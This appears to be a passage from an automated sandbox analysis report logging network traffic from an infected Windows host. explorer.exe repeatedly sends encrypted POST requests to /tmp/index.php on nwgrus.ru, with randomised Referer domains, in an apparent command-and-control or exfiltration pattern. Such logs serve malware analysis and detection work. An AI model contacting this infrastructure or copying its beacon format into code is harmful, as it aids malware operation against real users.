                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449739180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:24.993828058 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://hkuvmvjfakdhd.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 153
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:24.993864059 CEST153OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3c 1e c9 a5
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu<i(SPIhII'n:wV(8^VCrVM)
                                                                                                                                      Oct 8, 2024 03:14:26.372226954 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:26 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449740180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:26.381064892 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://gspricnhwajrk.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 116
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:26.381099939 CEST116OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 73 4f d8 91
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vusOc#nuIyhryI
                                                                                                                                      Oct 8, 2024 03:14:27.804676056 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:27 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.449741180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:27.813083887 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://ihkjhoeohsucndfk.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 341
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:27.813113928 CEST341OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 66 35 ce 84
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuf5XC{EkZ||<8h1@jJGc"F] UPA%}H7%cnsbS(E-]\""7edxzyNNooN$D
                                                                                                                                      Oct 8, 2024 03:14:29.188271999 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:28 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.449742180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:29.195943117 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://lpitxyhvwvj.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 356
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:29.195971012 CEST356OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 64 42 a2 aa
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vudB<w@:PS):(o@tx.[V@.ESaCfZb(<9AA4<>:I/^,[tvc#knFr:RF
                                                                                                                                      Oct 8, 2024 03:14:30.566800117 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:30 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.449743180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:30.575489044 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://yltrrjxrgdt.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 293
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:30.575522900 CEST293OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 32 09 df b6
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu2\?zt_uKTS.^"z=?:5F0W&EmI\l2l6G2N>)(]e8]1>_/an4xTbJP'
                                                                                                                                      Oct 8, 2024 03:14:31.966928005 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:31 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.449744180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:31.976115942 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://jypectwcaivky.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 147
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:31.976259947 CEST147OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 56 05 db f8
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuVYAcj8^w2Wo$$w,%8:4>5I
                                                                                                                                      Oct 8, 2024 03:14:33.349793911 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:33 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.449745180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:33.357906103 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://uvanlbvtcqkc.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 270
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:33.357943058 CEST270OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 7f 4e e9 8d
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuNDRU[ET#f8d9B:jMg'(OG1_m~t<&t}`3a0W:e+V8ELLHJWfj&S1
                                                                                                                                      Oct 8, 2024 03:14:34.724086046 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:34 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.449746180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:34.731926918 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://jkgktqvsjdwb.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 300
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:34.731926918 CEST300OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4c 34 e0 fe
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuL4VIznLjCI?6@E6v7)B[C91GMQ:5"gn1K$q4YzXgQCW*6PUDV4taB|k5L#2
                                                                                                                                      Oct 8, 2024 03:14:36.128566027 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:35 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.449747180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:36.136688948 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://cxrauupqkavo.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 157
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:36.136688948 CEST157OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3f 35 e5 fc
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu?5sXOa#.N>?j;'fJ_@BHQb4XMvE1X
                                                                                                                                      Oct 8, 2024 03:14:37.511106014 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:37 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.449748180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:37.519217014 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://fmrccqvtujxqbxpg.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 296
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:37.519237995 CEST296OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 65 09 ad f0
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuefNqy`8,QHUa|VjV!0JEAL_4Mjpl)*IWp{9`a(shZOfl@F(MS
                                                                                                                                      Oct 8, 2024 03:14:38.888278961 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:38 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
